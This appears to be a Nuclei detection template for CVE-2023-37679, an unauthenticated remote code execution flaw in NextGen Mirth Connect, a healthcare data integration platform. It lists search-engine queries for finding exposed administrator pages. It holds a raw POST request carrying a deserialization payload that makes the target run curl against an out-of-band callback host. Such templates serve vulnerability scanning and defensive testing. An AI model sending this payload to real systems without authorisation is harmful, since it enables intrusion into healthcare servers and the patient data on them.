id: CVE-2023-37679 info: name: NextGen Mirth Connect - Remote Code Execution author: iamnoooob,rootxharsh,pdresearch severity: critical description: | Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability reference: - https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/ - https://nvd.nist.gov/vuln/detail/CVE-2023-37679 - http://mirth.com - http://nextgen.com - http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-37679 cwe-id: CWE-77 epss-score: 0.07052 epss-percentile: 0.9396 cpe: cpe:2.3:a:nextgen:mirth_connect:4.3.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: nextgen product: mirth_connect shodan-query: - title:"mirth connect administrator" - http.title:"mirth connect administrator" fofa-query: title="mirth connect administrator" google-query: intitle:"mirth connect administrator" tags: packetstorm,cve2023,cve,nextgen,rce http: - raw: - | GET /api/server/version HTTP/1.1 Host: {{Hostname}} X-Requested-With: OpenAPI - | POST /api/users HTTP/1.1 Host: {{Hostname}} X-Requested-With: OpenAPI Content-Type: application/xml foo

java.lang.Comparable curl http://{{interactsh-url}}/ start

matchers: - type: dsl dsl: - 'compare_versions(version, "<4.4.1")' - 'contains(interactsh_protocol, "dns")' - 'status_code_1 == 200 && status_code_2 == 500' condition: and extractors: - type: regex part: body_1 name: version group: 1 regex: - '(.*)' internal: true # digest: 4a0a0047304502210090fa6ea3074ddefab156454bac75d98ecf2afccb77df469b6769e05ce26989a402201089a4c18eb1d115bde79688a15cbd51dacae795376dc2c19bde505d32158c91:922c64590222798bb761d5b6d8e72950